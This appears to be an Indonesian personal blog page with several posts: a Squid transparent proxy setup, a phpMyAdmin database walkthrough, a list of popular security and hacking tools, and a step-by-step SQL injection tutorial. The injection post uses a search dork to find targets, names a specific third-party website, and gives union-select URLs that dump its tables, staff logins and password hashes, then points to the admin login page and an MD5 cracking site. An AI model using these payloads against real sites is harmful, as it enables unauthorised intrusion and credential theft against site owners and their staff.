loading...

Minggu, 10 Mei 2015

Membangun proxy server sederhana

Dalam pembuatan proxy server ini dibagi menjadi beberapa tahapan. Tahapan tersebut sebagai berikut :
1.    topologi,














2.    tahap routing,
setting setiap perangkat NIC dengan mengetikkan sintak program berikut ini.
 

Kemudian masukkan sintak program kedalam file konfigurasi tersebut.
 
Restart konfigurasi jaringan dengan sintak berikut.





Selanjutnya rubah file konfigurasi sysctl.conf, dengan tujuan komputer pada client dapat mengakses jaringan luar atau internet dengan menggunakan sintak program pico /etc/sysctl.conf.
 

Pada file konfigurasi tersebut hilangkan tanda pagar (#) pada ip_forward untuk jenis ipv4.
 

Kemudian cek ip_forward telah akif atau belum dengan menggunakan sintak program cat /proc/sys/net/ipv4/ip_forward. Bila bernilai 1 (satu) maka ip forward telah aktif sebaliknya bila bernilai 0 maka ip forward dalam posisi tidak aktif.
 

Karena internet hanya mengenal ip public maka perlu diatur jaringan  client dengan ip lokal bisa digunakan untuk mengakses internet, maka disini bisa menggunakan masquerade, masquerade ini berfungsi untuk mewakilkan ip lokal sebagai ip public. Untuk menggunakan masquerade caranya dengan menggunakan sintak program berikut.
 

3.    tahap setting squid,
Langkah pertama yaitu memasang paket squid terlebih dahulu.
 

Selesai memasang paket squid, kemudian konfigurasi file squid tersebut. Namun sebelumnya salin terlebih dahulu file konfigurasinya.
 

Untuk mengkonfigurasi file squid, caranya dengan mengetikkan perintah berikut.




 

Kemudian rubah beberapa sintak di file konfigurasi squid tersebut.

http_port 3128 transparent
cache_mem 64MB
cache_mgr saktivands@smkn3yk.sch.id
visible_hostname www.smkn3yk.sch.id
shutdown_lifetime 5 seconds

Lalu tambahkan sintak sebagai berikut:

acl url dstdomain “/etc/squid/url.txt” 
no_cache deny url
http_access deny url
http_access allow all

Keluar dari file konfigurasi, kemudian buatt memori cache dengan mengetikkan sintak squid –z.
 

Kemudian buat file url.txt caranya dengan mengetikkan sintak program pico /etc/squid/url.txt.
 

Didalam file tersebut diisikan dengan daftar-daftar situs yang dipakai oleh squid.
 
Setelah selesai membuat file url kemudian restart squid dengan perintah /etc/init.d/squid restart.
 

Langkah selanjutnya yaitu men-tansparent proxy, teknik ini digunakan menyembunyikan alamat proxy yang biasanya dimasukkan kedalam aplikasi browser (seperti mozilla, internet explorer, etc). Sebelum melakukan teknik transparent proxy ini, langkah pertama harus memasukkan iptable agar  dapat me-redirect port yang berada pada komputer client. Tujuannya biasanya client memberikan permintaan untuk mengakses internet dengan port 80, maka dengan me-redirect port yang awalnya 80 akan menjadi port 3128 yang sesuai dengan port yang digunakan oleh squid. Untuk me-redirect port 80 menjadi 3128 caranya dengan menggunakan sintak program berikut.
 

Selanjutnya perintah masquerade dan juga perintah transparent proxy tadi disimpan kedalam file rc.local agar saat router direstart maka kedua konfigurasi tersebut tidak akan hilang
 


4.    tahap uji coba,
Pada tahap ini, dilakukan pengetesan kinerja squid yang dibuat tadinya yaitu dengan mensetting pada komputer sisi client yakni konfigurasi TCP/IP nya.
 

Kemudian mencoba membuka situs yang tidak di-blokir oleh squid dengan browser . Misal www.scripts.com
 

Seletah itu mencoba membuka situs yang diblokir oleh squid. Misal : www.facebook.com dan www.youtube.com
 
 

Lalu bila hanya proxy disetting untuk memberikan hak akses kepada client sesuai dengan daftar pada file url caranya dengan merubah tag http_access didalam file konfigurasi squid seperti berikut ini.

http_access allow url
http_access deny all


Semoga bermanfaat.

Cara Membuat Database mySQL di PHPMyAdmin dengan XAMPP

Untuk bahan pembelajaran atau praktek bagi yang ingin coba membuat database mySQL di PHPMyAdmin dengan software XAMPP berikut ini saya sedikit terangkan.
Tahapan membuat database mySQL di PHPMyAdmin:
1. Tampilan XAMPP:


2. Langkah pertama tentu saja membuka web browser kesayangan kamu. Ketikkan localhost
pada url addressnya.
3. Pilih menu phpMyAdmin.
4. Ketikkan nama database yang ingin dibuat, lalu klik tombol create untuk membuat database tersebut seperti yang ditunjukkan pada gambar dibawah ini.

5. Beri nama database dan tentukan jumlah fields, misalkan 5.

6. Masukkan kategori-kategori pada database yang akan dibuat, misalnya id, nama, alamat, dan lain-lain.

7. Isikan, jenis datanya, misalkan integer, varchar, date atau yang lainnya. Tentukan juga kategori mana yang akan dijadikan primary key.


8. Masukkan data-data sesuai kategori.

9. setelah itu, klik Go dan data tersebut akan tersimpan. Jika ingin melihat hasilnya, klik Browse dan akan muncul seperti gambar di bawah ini.

10. Database telah selesai dibuat, close browser. Kemudian stop XAMPP.

———————————– SELESAI —————————

Langkah langkah menggunakan sql injection

Dork : "inurl:content.php?id=" site:info, Di posting yang ke 20 ini BELAJAR LINUX lagi - lagi membuat threat SQL INJECTION, untuk kamu yang masih blom pakek backtrack linux, hmmmm.. sengasara juga kalo ga ada sqlmap tuh mau gak mau harus manual, oia lanjut lagi tutornya
Untuk Dork masih banyak yang lain, dan akan ada di postingan berikutnya :D
Untuk target kali ini >> http://www.mirbg.info/content.php?id=23

Tambah string ' (tanda kutip ganda) di akhir Url, jika vuln maka akan ada tulisan seperti ini Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in/home/mirbg/public_html/content.php on line 9


http://www.mirbg.info/content.php?id=23'



Lakukan perintah order by sampai pesan eror muncul lagi


http://www.mirbg.info/content.php?id=23 order by 1-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 2-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 3-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 4-- (Erorr)


Kesimpulannya kita mengambil yang 3 atau table nya berjumlah 3 :D
Selanjutnya lakukan dengan perintah union all select
http://www.mirbg.info/content.php?id=-23 union all select 1,2,3--
Lihat angka berapa yang kita dapat =))


Kebetulan muncul angka 2 mas broo,.. ayo lanjutkan !!
Next... kita musti mengetahui versi web tersebut,. dengan perintah version() atau @@version http://www.mirbg.info/content.php?id=-23 union all select 1,version(),3--

Keterangan : kita bisa lanjutkan tutorial ini jika target web versi 5.1.56-log, kalu versi 4 main tebak-tebakan =)) kwkwkwkwkw, bagi yang mau boleh aja..
ok next..
Mencari table dengan perintah table_name dan di akhir url tambah from information_schema.tables--

http://www.mirbg.info/content.php?id=-23 union all select 1,table_name,3 from information_schema.tables--

Lanjut,..
dengan perintah group_concat dan di akhir url tambah ini where table_schema=database()--
http://www.mirbg.info/content.php?id=-23 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--




Ok, kita mendapatkan banyak table =))
TBL_TEXTS_SEQ,tbl_articles,tbl_content,tbl_form1,tbl_form2,
tbl_languages,tbl_staff,tbl_staff_sessions,tbl_texts,tbl_words

kita buka table yang penting-penting saja (biasanya untuk login)
Sebelum meng inject anda harus menubah table tersebut ke hexa decimal
contoh kita mengambil tbl_staff dan hexadecimalnya adalah 74626c5f7374616666
Jadi >>
http://www.mirbg.info/content.php?id=-23 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x74626c5f7374616666--

Liat apa yang anda dapat =))
isi dari tbl_staff
s_id,s_name,s_login,s_pass,s_admin,s_id,s_name,s_login,s_pass,s_admin

Lihat isi column dengan perintah concat_ws(table_yang_berisi_user_dan_pass)
di akhir url from nama_table_berasal--
http://www.mirbg.info/content.php?id=-23 union all select 1,concat_ws(0x3a,s_login,0x3a,s_pass),3 from tbl_staff
Lihat dan nikmati apa yang kamu dapatkan, :D
Lanjutkan dengan mencari login page
http://www.mirbg.info/admin/index.php
dan untuk password admin, biasanya harus di deckrypt dulu di MD5 Decrypter

Keterangan :
MD5 Decrypter --> http://www.md5decrypter.co.uk/
Converter string to Hexa ---> http://www.string-functions.com/string-hex.aspx

Selasa, 02 Desember 2014

Best Hacking Tools

* Wireless Hacking: Ini adalah alat yang membantu Anda hack ke jaringan nirkabel. Hacking tools nirkabel meskipun berguna, tidak membuat Anda seorang hacker yang lengkap. Untuk mencapai itu, Anda harus mempelajari cara-cara yang berbeda di mana jaringan yang aman dapat diakses. Juga, Anda harus bekerja untuk membuat jaringan Anda sendiri sebagai aman mungkin.

1. Aircrack-ng
2. Kismet
3. inSSIDer
4. KisMAC


* Intrusion Detection Systems: alat deteksi intrusi adalah salah satu bagian terpenting dari setiap pengaturan keamanan. Mereka memungkinkan Anda untuk mendeteksi ancaman-ancaman yang berpotensi berbahaya bagi sistem anda.
1. Snort
2. NetCop 


* Port Scanners
1. Nmap
2. Superscan
3. Angry IP Scanner


* Enkripsi Tools: Di zaman di mana semakin banyak pemerintah sedang ditemukan memata-matai warga negara mereka sendiri, enkripsi adalah kata hari ini. Alat-alat ini memungkinkan Anda untuk mengenkripsi data Anda sehingga bahkan jika seseorang melewati, mereka tidak bisa mendapatkan data dengan mudah.
1. TrueCrypt
2. OpenSSH
3. Putty
4. OpenSSL
5. Tor
6. OpenVPN
7. Stunnel
8. KeePass


* Sandi Kerupuk: Nama ini cukup jelas dalam kasus ini. Alat-alat ini membantu Anda memulihkan password dari data bahwa sistem komputer menyimpan atau transmisi melalui jaringan.
1. Ophcrack
2. Medusa
3. RainbowCrack
4. Wfuzz
5. Brutus
6. L0phtCrack
7. fgdump
8. THC Hydra
9. John The Ripper
10. Aircrack - Aircrack is 802.11 WEP and WPA-PSK keys cracking program.

11. Cain and Abel

* Packet Kerajinan: Packet kerajinan adalah teknik di mana seorang penyerang menemukan kerentanan atau titik masuk dalam firewall Anda. Alat-alat ini membantu Anda mencapai itu lebih mudah.
1. Hping
2. Scapy
3. Netcat
4. Yersinia
5. Nemesis
6. Socat


* Pemantauan Lalu Lintas: Ini adalah alat yang memungkinkan Anda memantau website apa karyawan Anda atau anak-anak sedang memantau.
1. Splunk
2. Nagios
3. P0f
4. Ngrep


* Sniffers paket: Ini adalah alat yang dapat memungkinkan Anda untuk menangkap dan memvisualisasikan lalu lintas yang datang di website Anda.
1. Wireshark
2. Tcpdump
3. Ettercap
4. dsniff
5. EtherApe


* Kerentanan Eksploitasi: Ini adalah alat yang akan Anda gunakan untuk mendapatkan akses ke berbagai tempat.
1. Metasploit
2. sqlmap
3. sqlninja
4. Social Engineer Toolkit
5. NetSparker
6. BeEF
7. Dradis